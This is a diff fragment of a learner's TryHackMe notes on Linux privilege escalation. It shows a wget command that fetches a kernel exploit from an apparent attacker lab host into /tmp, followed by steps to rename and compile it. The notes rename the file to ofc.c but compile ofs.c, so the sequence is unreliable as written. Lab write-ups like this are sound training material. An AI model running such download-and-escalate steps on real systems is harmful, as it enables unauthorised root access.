clydebuilt1974/TryHackMe/Junior Penetration Tester/Privilege Escalation/Linux Privilege Escalation.md

 wget http://10.10.166.35:9000/37392.c -P /tmp/
 ```
   * `-P` option specifies that the file should be saved to the `/tmp/` directory on the target.
-  * Specify the path as `/tmp/` where the file be downloaded to avoid the permission error while running `wget` because you are a low-level privilege user (karen).
+    * Specify the path as `/tmp/` to avoid the permission error while running `wget` as a low-level privilege user (karen).
 6. Run the exploit file to perform privilege escalation.
 > Some exploits may require further interaction once they are run.
 Read all comments and instructions provided with the exploit code.
-  * Rename exploit file.
+  * Rename the exploit file.
 ```
 ofc.c: mv ./37392.c ofc.c
 ```
-  * Compile C source code file `ofs.c` into a binary executable file named `ofs`.
+  * Compile C source code file into a binary executable file.
 ```
 gcc ofs.c -o ofs
 ```